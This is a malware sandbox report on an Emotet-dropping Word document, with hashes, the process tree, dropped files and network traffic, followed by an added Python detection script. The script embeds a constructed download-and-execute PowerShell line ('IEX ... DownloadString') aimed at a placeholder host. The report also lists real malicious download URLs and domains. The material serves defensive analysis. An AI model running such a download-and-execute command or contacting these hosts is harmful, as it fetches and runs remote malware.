File name: | details3628533.doc |
Full analysis: | https://app.any.run/tasks/3f46faf4-366c-4609-ae8b-a59d5975c970 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 18:26:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Supervisor Fork, Subject: synthesize, Author: Brando Raynor, Comments: Public-key, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 2EA05092B941BD56A5BE5C93A0B9361A |
SHA1: | AECCD0634FD64CCC813C8F44BB0198D2313A0EA0 |
SHA256: | D1E721DD421D6BAD1DCC2AC1B44C482F89CFC8BDB5A2D5AD744EDB8FD47D41A5 |
SSDEEP: | 6144:TByxNRIIt1POT3XtwNJ6mdNPLkIZ7NSU4jJntATfDdGPy4sSK4:TByxNRIIt1POT3XtwNJ6mdNXZ7NSU4Vv |
Extension | Description (match score)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Title: | Supervisor Fork |
---|---|
Subject: | synthesize |
Author: | Brando Raynor |
Keywords: | - |
Comments: | Public-key |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:09:18 14:38:00 |
ModifyDate: | 2019:09:18 14:38:00 |
Pages: | 1 |
Words: | 95 |
Characters: | 547 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | Wilderman - Bradtke |
Lines: | 4 |
Paragraphs: | 1 |
CharCountWithSpaces: | 641 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | -
Manager: | Medhurst |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
2760 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\details3628533.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000
3036 | powershell -encod … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255)
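The process tree above shows the detection point that matters in this sample: PowerShell is launched with an encoded command (`-encod` is an accepted prefix of `-EncodedCommand`), but its parent is wmiprvse.exe, not WINWORD.EXE. The macro created the process through WMI (Win32_Process.Create), so a rule that only looks for Office applications spawning powershell.exe misses it. The script below is an added example, not ANY.RUN's code or output: it walks a set of constructed process-creation records (PIDs 2760 and 3036 and their image paths follow the report, the parent PIDs and the base64 payload are assumptions because the real encoded command is redacted above), flags PowerShell launched by an Office binary or by WmiPrvSE.exe, decodes the `-EncodedCommand` argument (base64 over UTF-16LE) and pulls the download URLs out of the decoded script.

```python
import base64
import binascii
import ntpath
import re

# Constructed sample script and its encoded form. This is a stand-in for the
# redacted payload in the report, not the real one; the host is deliberately
# an .invalid name.
SAMPLE_SCRIPT = (
    "IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/wp-admin/x1/')"
)
SAMPLE_ENCODED = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii")

# Constructed process-creation records modelled on the report's process table.
# Parent PIDs (1000, 600, 1500) are assumptions; the sandbox did not print them.
PROCESSES = [
    {"pid": 1000, "ppid": 0, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 2760, "ppid": 1000,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "cmd": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
            r'"C:\Users\admin\Downloads\details3628533.doc"'},
    {"pid": 1500, "ppid": 600, "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "cmd": r"C:\Windows\system32\wbem\wmiprvse.exe"},
    {"pid": 3036, "ppid": 1500,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": f"powershell -encod {SAMPLE_ENCODED}"},
    # Benign control case: plain PowerShell under explorer.exe, no encoded command.
    {"pid": 4100, "ppid": 1000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

# Parents that make a PowerShell launch worth a look: Office applications, and
# WmiPrvSE.exe, which is the parent when a macro uses WMI to create the process.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe",
                      "outlook.exe", "wmiprvse.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand
# (-e, -ec, -enc, -encod, ...). -ExecutionPolicy is the other -e* switch and
# is not matched because "ex" is not in the alternation.
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en[a-z]*)\s+([A-Za-z0-9+/=]{8,})")
URL_RE = re.compile(r"https?://[^\s'\"();,]+", re.IGNORECASE)


def extract_encoded_command(cmd):
    """Return the base64 argument of -EncodedCommand (any accepted prefix), or None."""
    m = ENCODED_RE.search(cmd)
    return m.group(1) if m else None


def decode_encoded_command(b64):
    """-EncodedCommand carries base64 of the UTF-16LE bytes of the script."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def extract_urls(script):
    return URL_RE.findall(script)


def find_suspicious_powershell(processes):
    """Flag powershell.exe with a suspicious parent or an encoded command."""
    by_pid = {p["pid"]: p for p in processes}
    findings = []
    for p in processes:
        if ntpath.basename(p["image"]).lower() != "powershell.exe":
            continue
        parent = by_pid.get(p["ppid"])
        parent_name = ntpath.basename(parent["image"]).lower() if parent else "<unknown>"
        b64 = extract_encoded_command(p["cmd"])
        if parent_name not in SUSPICIOUS_PARENTS and b64 is None:
            continue
        script = decode_encoded_command(b64) if b64 else None
        findings.append({
            "pid": p["pid"],
            "parent": parent_name,
            "encoded": b64 is not None,
            "script": script,
            "urls": extract_urls(script) if script else [],
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_powershell(PROCESSES):
        print(f"pid={f['pid']} parent={f['parent']} encoded={f['encoded']}")
        print("  script:", f["script"])
        print("  urls:", f["urls"])
```

Against real telemetry (Sysmon event ID 1, EDR process events), feed the same record shape. Keep both conditions in the rule: the parent check catches the WMI hop seen in this report, and the encoded-command check catches the same payload when a different launcher (WScript.Shell, mshta, rundll32) is used instead.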
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA05B.tmp.cvr | — | — | —
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\279896E5.wmf | wmf | 1C31597DE93A5F0BE36AA5D42B5B23AC | 7DE1C3C1A602EA1124F4E45E11598B392009ECF94460DFB22AA20185E6749C0E
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 61A05CF1CF86CD484E7AE58F75B09611 | FEA19ECAA3BAD28C0369986DF90007550E1ED34794DA05CACD144442C6729D05
2760 | WINWORD.EXE | C:\Users\admin\Downloads\~$tails3628533.doc | pgc | BFDAE11871801EDEFCFD12C8B117E4A7 | DE2721E6549EFFA62E91F20EE281F3CF48423881D953DB959B03738CB90341D0
2760 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\details3628533.doc.LNK | lnk | 6C484FB6E34BD5C0298CDCE05B12AB9C | CF97EB8C3912381F4A7BBC9285D57342D889D9408A0FBC30CB9C8CD7C545050F
2760 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | 98D391A82325B8A9F20FF8CE7B805E66 | 291E43DFAC33ECB414F082E34EE2AEFD1D15AD0B84A69E4F2555AFE0785B7397
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7118DFF3.wmf | wmf | 01F548FC6F5642596B1B5CE353D80A56 | 63DA479512F5A823766122E7F6BC7A6ECBED6E5A0C44CE098A20FC6CCA2C4D6A
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8B3BE7A2.wmf | wmf | 8E6DEF5B61985AAA923C8E4E256082EC | D54FC5860A92CD9FEDF3A1A3A83876C60EF282C3729C5625FC97BDEAA52452EC
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C289179.wmf | wmf | 96CC9C4B08468C28CF7074368E7E6A53 | 450063BB002DB2001A2AD3F6DD91C88729E0FC7E7DBF2CF7EB219802D7E24F0C
2760 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5AD1CDD.wmf | wmf | 580D15C97EF1A4A0E77C9964518125DC | 7F924875AD8DA49D8A8FF46DED6A9AC586DB7938E29CF19308A9A7ACB8927B2A
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3036 | powershell.exe | GET | 404 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | xml | 345 b | suspicious |
3036 | powershell.exe | GET | 404 | 104.28.5.162:80 | http://trunganh.xyz/wp-content/uzq50/ | US | xml | 345 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3036 | powershell.exe | 104.27.132.144:443 | mnpasalubong.com | Cloudflare Inc | US | shared |
3036 | powershell.exe | 31.210.70.130:443 | iptivicini.com | Radore Veri Merkezi Hizmetleri A.S. | TR | unknown |
3036 | powershell.exe | 212.47.241.236:443 | www.cezaevinegonder.com | Online S.a.s. | FR | unknown |
3036 | powershell.exe | 104.28.5.162:80 | trunganh.xyz | Cloudflare Inc | US | shared |
3036 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
Domain | IP | Reputation
---|---|---
thinhvuongmedia.com | — | suspicious
mnpasalubong.com | — | unknown
trunganh.xyz | — | suspicious
iptivicini.com | — | unknown
www.cezaevinegonder.com | — | unknown
PID | Process | Class | Message |
---|---|---|---|
3036 | powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |